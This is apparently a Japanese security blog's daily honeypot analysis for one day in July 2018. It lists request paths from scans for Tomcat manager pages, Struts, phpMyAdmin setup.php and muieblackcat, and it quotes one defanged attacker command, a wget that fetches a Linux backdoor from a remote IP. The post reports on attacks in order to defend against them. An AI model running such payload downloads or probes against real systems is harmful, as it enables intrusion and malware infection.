WOWHoneypotの簡易分析(44日目)
WOWhoneypotの2018/07/17(火)(運用44日目)の簡易分析です。
本日の総アクセス件数は 84件です。以下が全アクセスログです。
32 2018-07-17 GET /
30 2018-07-17 GET /manager/html
13 2018-07-17 GET /index.action
1 2018-07-17 HEAD /redirect.php
1 2018-07-17 GET //pma/scripts/setup.php
1 2018-07-17 GET //phpMyAdmin/scripts/setup.php
1 2018-07-17 GET //phpmyadmin/scripts/setup.php
1 2018-07-17 GET //MyAdmin/scripts/setup.php
1 2018-07-17 GET //myadmin/scripts/setup.php
1 2018-07-17 GET /muieblackcat
1 2018-07-17 GET hxxp://114.215.207[.]183:83/index.php
1 2018-07-17 GET hxxp://112.124.116[.]170:83/index.php
phpMyAdmin関連(5件)と/を除外したアクセス数です。
30 2018-07-17 GET /manager/html
13 2018-07-17 GET /index.action
1 2018-07-17 HEAD /redirect.php
1 2018-07-17 GET /muieblackcat
1 2018-07-17 GET hxxp://114.215.207[.]183:83/index.php
1 2018-07-17 GET hxxp://112.124.116[.]170:83/index.php
既知の攻撃は以下の通り。
「GET /manager/html」はTomcatの管理ページへのブルートフォース攻撃。
「GET /index.action」はStrutsの脆弱性をついた攻撃。
「GET hxxp://(ipaddr):83/index.php」は不正中継の調査。
新たに出たものについては、以下のスキャンがありました。
HEAD /redirect.php HTTP/1.0
User-Agent: www.probethenet.com scanner
Content-Type: text/html
このUAについては、以下の記事に解説があります。
https://www.distilnetworks.com/bot-directory/bot/probethenet-com-scanner/
記事ではユーザから許可を得たときのみスクラップするWebスクレイパーと記載がありますが、特段許可は与えていない為、どうしてスキャンされているのかは不明です。なお、送信元IPは記事のものと同様でした。
また、新規でもう一つ検知しています。
GET /muieblackcat
これは以下の記事にあるように、phpMyAdminへのスキャンを行っていました。
https://eromang.zataz.com/2011/08/14/suc027-muieblackcat-setup-php-web-scanner-robot/
このbotからのスキャンの場合には、リクエストパスの先頭が//となっているのが特徴です。
本日のハンティングログは以下です。Strutsの脆弱性をついた攻撃でダウンロードされるものです。
1 2018-07-17 wget hxxp://222.186.153[.]142:26591/nodebase
取得するファイルはLinux向けのbackdoor/MaydayまたはDropper/Elknotと出ています。
以上です。